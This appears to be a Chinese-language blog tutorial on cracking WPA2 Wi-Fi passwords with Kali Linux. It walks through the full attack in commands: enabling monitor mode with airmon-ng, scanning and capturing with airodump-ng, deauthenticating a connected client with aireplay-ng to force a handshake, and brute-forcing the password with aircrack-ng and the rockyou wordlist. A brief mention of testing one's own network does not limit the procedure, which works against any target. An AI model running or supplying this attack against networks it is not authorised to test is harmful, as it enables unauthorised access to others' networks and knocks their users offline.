會用 kali 破解 wifi 嗎?
VSole2023-02-16 14:17:15
1. 執行以下命令查看電腦設備
iwconfig

“檢查出現 wlan0 即可! 因為本人電腦的特殊性,有一個單讀網卡 wlan1(本案例用的 wlan1)
2. [監聽]附近網絡:
airmon-ng start wlan0

“完成上述操作后,我門內再次用iwconfig的命令查看此時會如下圖出現 wlan0mon,說明已經進入監聽狀態
3. 掃描附近的網絡,開啟監聽模式后無線網卡無法繼續連接 wifi,使用后需要關閉監聽模式
airodump-ng wlan0mon

“wlan0 信道出現問題,無法監聽到附近 wifi;
“如果依然無法解決,那應該就是 wlan0 硬件有問題了,那么就只能購買無線 usb 驅動了(這樣就出現了 wlan1)
使用命令airmon-ng stop wlan0mon停止 wlan0 的監聽,本機監聽 wlan1:airodump-ng wlan1
“下圖即是監聽到的 wifi

破解主要用到的 BSSID 以及 CH; 這一步會輸出兩個列表,兩個列表不停在刷新。 第一個列表表示掃描到的無線網絡 AP 信息,會用到以下幾列信息: BSSID: 無線 AP 的硬件地址 PWR: 信號強度,值是負數,絕對值越小表示信號越強 CH: 無線網絡信道 ENC: 加密方式,我們要破解的是 WPA2 ESSID: 無線網絡的名稱 第二個列表表示某個無線網絡中和用戶設備的連接信息: BSSID: 無線 AP 的硬件地址 STATION: 用戶設備的硬件地址 掃描列表會不停刷新,確定最終目標后按 Ctrl+C 退出。
4. 開始抓包,對自家 wifi 進行測試;使用命令:airodump-ng –bssid BSSID -c 信道頻率 -w 抓包存儲的路徑 wlan0mon(本機是 wlan1)
airodump-ng --bssid DC:FE:18:AE:12:3A -c 1 -w /home/wifi wlan1 #信道1

station:鏈接的設備物理地址
5. 打開一個新的終端,開始對目標設備發起攻擊,使用命令:aireplay-ng -<攻擊模式> < 攻擊次數 > -a 無線 AP 硬件地址 > -c < 用戶設備硬件地址 > < 處于監聽模式的網卡名稱 >
對應會生成如圖文件,在 /home/wifi 下:
aireplay-ng -0 0 -c F8:A2:D6:B9:13:C5 -a DC:FE:18:AE:12:3A wlan1
“掃描過程中如果有用戶設備嘗試連接 Wi-Fi 時,我們就會拿到握手包。
“只有當掃描狀態后面出現 ][ WPA handshake: DC:FE:18:AE:12:3A 后,我們才拿到拿到進行破解的握手包。
所以我們可以同時使用 aireplay-ng 對目標設備進行攻擊,使其掉線重新連接,這樣我們就拿到了握手包。

拿到握手包后按 Ctrl+C 結束掃描即可。
“發起攻擊后,當 airodump-ng 成功拿到了握手包,使用 Ctrl+C 退出攻擊。
“查看握手包 wifi-01.cap,如果出現多個選擇數字大的,如 wifi-02.cap、wifi-03.cap·······

6. 開始暴力破解 wifi 密碼,使用命令:aircrack-ng -w 密碼字典 <包含握手包的 cap 文件>
“本人使用 kali 自帶的字典:目錄/usr/share/wordlistsaircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-01.cap

“這將會耗費很多時間,最終獲取到密碼或者沒有獲取到密碼(那需要你更換一個密碼詞典再次嘗試)
7. 信號更換命令:
iwconfig wlan1 channel 7
VSole
網絡安全專家